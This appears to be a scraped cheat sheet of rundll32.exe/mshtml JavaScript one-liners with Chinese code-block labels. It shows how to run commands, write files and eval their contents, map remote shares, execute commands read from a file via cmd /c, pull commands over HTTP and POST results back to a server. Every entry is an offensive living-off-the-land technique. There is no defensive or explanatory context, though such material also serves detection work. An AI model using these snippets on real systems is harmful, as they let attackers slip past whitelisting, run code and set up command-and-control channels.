//Execute A Command
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new ActiveXObject("WScript.Shell").Run("calc");//Write To A File
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";fso=new ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\Temp\testfile.txt",true);a.WriteLine("Test");a.Close();self.close;//Read and Execute From A File
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();fso=new ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\Temp\testfile.txt",1);eval((f.ReadAll()));//Map A Remote Share (WEBDAV)
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";n=new ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close;//Map A Local Share
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";n=new ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\Localhost\c$");self.close;//Read and Execute Commands From A File
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();fso=new ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\Temp\Commands.txt",1);while(!f.AtEndOfStream){t=new ActiveXObject("WScript.Shell");t.Run("cmd /c " f.ReadLine(),null,true);};//Retrieve Commands From HTTP
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B);//POST results back to Server
代码语言:javascript复制rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff");
